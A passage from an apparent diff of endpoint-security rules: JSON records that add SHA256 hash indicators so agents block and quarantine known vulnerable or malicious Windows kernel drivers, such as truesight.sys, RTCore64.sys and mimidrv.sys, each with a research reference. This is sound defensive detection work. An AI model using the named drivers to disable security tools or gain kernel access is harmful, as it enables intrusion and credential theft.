AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ecb708fa-2483-5b89-8f08-d2f73a9b3155", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477741Z", + "creation_date": "2026-03-23T11:45:31.477745Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477755Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3c55a31740816e8aba78ab270aa26999da006dcea48e73cae0b6bee2e326f4b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ecc12212-a9b6-524e-9544-088928d606ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499590Z", + "creation_date": "2026-03-23T11:45:31.499593Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499602Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a5c69d0f3777e09938fc2ecc46b688189241467166c38d9cce8a3ca5379e27e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ecc5e407-be8e-5825-a998-96feca5bbedb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141576Z", + "creation_date": "2026-03-23T11:45:31.141578Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141584Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc7bd7db82d8aba66b589dc5b48e114df6d20c121b088295ed55798cf6deb427", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ecce9d9a-b037-5514-9ff4-bd171876320a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472955Z", + "creation_date": "2026-03-23T11:45:31.472958Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472966Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d4522bc656775881708a62fa68dfc0eaee7cc91b542003b426cdc1f6243bb447", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ecde9558-37de-5be8-ace3-7a82be3d474d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975673Z", + "creation_date": "2026-03-23T11:45:29.975675Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975680Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf3180f5308af002ac5d6fd5b75d1340878c375f0aebc3157e3bcad6322b7190", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ecec630f-04b2-5cc6-a7c5-8a841d48db88", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159085Z", + "creation_date": "2026-03-23T11:45:31.159088Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159093Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e7256f5675f54672942fb1300a20c721bf437cdb4426ba7c412c8ab5fcb1321", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ecf093cc-21aa-55c8-9706-9bef5833626c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820355Z", + "creation_date": "2026-03-23T11:45:30.820357Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820363Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"e3dbafce5ad2bf17446d0f853aeedf58cc25aa1080ab97e22375a1022d6acb16", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ecf7870f-0dd6-5477-bb0c-a70660d579b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807796Z", + "creation_date": "2026-03-23T11:45:31.807799Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807806Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "195b6b52d6279cbb21ad736aa73aa01f61a065a4d5dcf8a41a7ee36b9f108a53", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ecff96fc-71e7-5701-b544-ca995e264b3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476973Z", + "creation_date": "2026-03-23T11:45:31.476977Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476987Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e882e73f6cced1a165085580a41d3f1e7659c6d99644a7770d1f385a6668bce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed0de857-cf10-5ccb-9bdc-022d9dc4daee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824137Z", + "creation_date": "2026-03-23T11:45:31.824140Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824148Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c35a097545fdb2fa0d3b1a1b69e7222629b19eca8347f0a8c23b4603959490fb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed214459-5d8c-5901-82ad-2511de7ec128", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155684Z", + "creation_date": "2026-03-23T11:45:31.155686Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155691Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8cede7500fbd30800c1d05cd70d9ea3c936b20805e62c6e9be432c1fbb1a5a18", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed2ed9fa-0961-54ec-a829-6e05aeb31293", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143360Z", + "creation_date": 
"2026-03-23T11:45:31.143362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143367Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e49ed9c5f345602eb9c0511eed977eb59a1f6d8dd0a570bea8fe10e77ce8a3c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed2f455d-abcb-5b94-baf0-077990030263", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462792Z", + "creation_date": "2026-03-23T11:45:30.462795Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462804Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a906251667a103a484a6888dca3e9c8c81f513b8f037b98dfc11440802b0d640", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed35e352-78fc-55dd-890e-7f1a063e3d9e", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153068Z", + "creation_date": "2026-03-23T11:45:31.153071Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c69bd737aaa422ca1cbf538ba38d8b46981f8252e9e1248f78844e7f261b5e69", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed379425-d74d-5cf6-bfce-fd244eaaf1e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160493Z", + "creation_date": "2026-03-23T11:45:31.160496Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.160504Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58895b577db6e087173ac632247d3cc559fc5062980db333ca988313db4a1c2e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed486959-4dee-52af-8046-875acfd28e95", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618185Z", + "creation_date": "2026-03-23T11:45:29.618187Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618192Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8162811e8aae05884e8cb84b8dd87c310e5ed5ec588b9023a4d849d558d6ae34", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed71ad43-7ff2-5500-91e7-4ecc5a408a8f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 
10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152315Z", + "creation_date": "2026-03-23T11:45:31.152318Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152326Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "75102e174a843b128893b570eacc87b575bfee22ac29cbdcce6fba133537a6b4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed757c14-7fc0-5b0c-9383-5cd7d2188669", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985978Z", + "creation_date": "2026-03-23T11:45:29.985980Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985986Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, 
+ "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "751e9376cb7cb9de63e1808d43579d787d3f6d659173038fe44a2d7fdb4fd17e", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed767e9f-2b06-5dd5-aba0-6cff96246a89", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607782Z", + "creation_date": "2026-03-23T11:45:29.607784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607790Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae6fb53e4d8122dba3a65e5fa59185b36c3ac9df46e82fcfb6731ab55c6395aa", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed851c6f-a459-5b06-9d90-c7829270b3ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817078Z", + "creation_date": "2026-03-23T11:45:31.817080Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "967b589e8ddfcd69a0c8e0e11db85bbc50a7e6999fba524434dc23510c14d115", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed863673-1529-58f3-98e8-32331c537a77", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473732Z", + "creation_date": "2026-03-23T11:45:31.473735Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"2f8f06b727dd3e71b4cb51cabaf5dec26ec3416f2e09bfb1dbb15e06a12bc65a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed87a1a6-1ee2-5c69-93d9-9595e8df02a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619036Z", + "creation_date": "2026-03-23T11:45:29.619038Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619043Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e69bba9f8aae090226841a02e6207fb37f784b83c6641ea15bd20e7bd3418d87", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed8cf419-0d64-5240-9d45-148be9987cf0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490350Z", + "creation_date": "2026-03-23T11:45:31.490351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2bbd19219a53633c7e815cefd2dbe0dab2eeffcdb35626a9ef3c6cef713f1c95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed8d4639-c927-590a-b507-416c40fc013f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967438Z", + "creation_date": "2026-03-23T11:45:29.967440Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967445Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b16c3ed44cd04b033621ada7f9ab89d830949b3c9dc26999d862ddbeb7cc5a86", + "comment": 
